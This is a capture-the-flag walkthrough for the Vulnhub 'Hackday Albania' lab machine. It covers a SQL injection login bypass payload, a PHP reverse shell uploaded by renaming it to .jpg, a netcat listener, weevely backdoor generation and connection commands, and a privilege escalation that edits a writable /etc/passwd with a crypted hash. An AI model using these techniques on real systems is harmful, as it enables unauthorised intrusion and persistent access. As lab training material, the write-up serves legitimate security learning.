Vulnhub Hackday Albania

Enumeration

Like always, we start off the game with an general nmap scan.

nmap -vv -Pn -A -sC -sS -T 4 -p- 192.168.1.131

There seem to only be two ports open 22 and 8008 which is running Apache 2.4.18

Apache

Let’s investigate the website.
We saw that there’s a robots.txt with our nmap scan.
When we log into the website that’s a window saying

-> Ne qofte se jam UNE, e di se ku te shkoj ;)

Using google translate we end up with

-> If I am UNE, I know where to go;)

It doesn’t tell us much.

Source code

While looking at the source code, we can notice that there’s a comment near the end of the page saying

O ok, por jo ketu :)

That translate into

Ok ok, but not here :)

Once again we’re not getting much.

Let’s switch to the robots.txt

Robots.txt

If we go to the page 192.168.1.149:8008/robots.txt, we get to see this text

Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

And if we try one to append a line to the url we get an image.
Since there’s a lot of line, we’ll write a script to crawl through the page and download whatever there’s inside. By doing a simple curl thru all the folder i found one that had a message
instead of a image.

IS there any /vulnbank/ in there ???

I tried 192.168.1.149:8008/vulnbank/ but it didn’t work.
I then tried to append it to the page where i found the message

http://192.168.1.149:8008/unisxcudkqjydw/vulnbank/

We’re getting somewhere, we got a directory listing with a client folder that
leads into a “Very secure bank”

SQli

We got a username and password input box, looks like we’re going to need to sql injection our way through.
After trying for more than one hour i decided to use burp intruder to do my job.

Using burp intruder and a list found on this github -> https://github.com/1N3/IntruderPayloads we found one winning combination out of 240 try.

‘ OR ‘p’=’p’ #;

Will bypass the login.

Account

We’re inside the account and there’s an upload button.
We’re going to try to upload the php reverse shell.

After our first try, we can see that the website verifies the extension of the file.
Second try we’ll just rename it and .jpg and it goes thru.

I’ll setup nc to listen for the incoming connection

nc -lv 1234

We load the page and boom! We got a reverse shell.

Privilege Escation

We’re inside the system, now we need to get to root.
First things first.

uname -a

linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64
x86_64 x86_64 GNU/Linux

We’re dealing with a kernel 4.4.0 this could still be vulnerable to dirty cow? And …. nop

Let’s see which OS it’s running

cat /etc/lsb-re*

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION=“Ubuntu 16.04.1 LTS”

We got something pretty recent.

Enumeration

After spend a couple of hours looking at the services and libraries, i was
still not able to elevate my privileges.

I tried a bunch of exploits that either crash the machine or just did nothing.
Only having a reverse shell was quite annoying because you couldn’t go back to get a command you typed a while ago.

So after googling a bit i found weevely. What a beautiful tool.
It let’s us create a backdoor in php and upload it directly on the server.

Weevely

We need to create the backdoor.

weevely generate toor me.php

This will create the backdoor with the password toor.

Once that is done with got to upload it in a folder where we can access it from outside.
In our case we need to put the file in the same directory where we upload our
jpg in the previous steps.

By doing a quick find on the jpg file that we uploaded we see that the
directory is /var/www/html/unisxcudkqjydw/vulnbank/client/upload

We can either do a wget the file directly from the kali machine by hosting a
http server using python -m SimpleHTTPServer or using nc or one of the
multiple way available.

Once the backdoor is in, we can go back to our kali machine and use the following command to establish the connection

weevely http://192.168.1.149:8008/unisxcudkqjydw/vulnbank/client/upload/me.php toor

Where me.php is the backdoor and toor is the password.

We now have a shell that will allow us to have more function that the basic reverse shell.

Weevely is love

Weevely has a bunch of commands that does stuff for us. :help will show them.
In our case one command will show us a way to obtain root.

:audit_filesystem

If we look at the result we can see that in the /etc/ folder the file passwd is writeable. There’s our door.

Weevely is life

In our simple reverse shell we couldn’t use vim correctly. Weevely fixes that.
What we need to do is change the password of the users that we want.

In our previous enumeration i noticed that in the home directory of the user
taviso, he had the file sudo_as_admin_successful.

That means that he has sudo rights as admin. So i’ll be changing the password
of taviso to whatver i want.

We can replace the second field in passwd by a password, but the password needs to be crypted. Perl will allow us to generate the crypted password

perl -le ’print crypt(”foo”, ”aa”)
aaKNIEDOaueR6

Where foo is the new password.

We edit the /etc/passwd file

vi /etc/passwd

taviso:aaKNIEDOaueR6:1000:1000:Taviso,,,:/home/taviso:/bin/bash

I tried using su to switch user but it was not available. Let’s just try to ssh into the machine directly.

SSH

We can ssh directly as taviso

And we’re in!

Let’s see our sudo rights

sudo -l

Matching Defaults entries for taviso on hackday:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User taviso may run the following commands on hackday:
        (ALL : ALL) ALL

ALL : ALL ALL
That’s good game.
We got all the rights.

sudo passwd root

su root

Changing root password and switching into him.

GG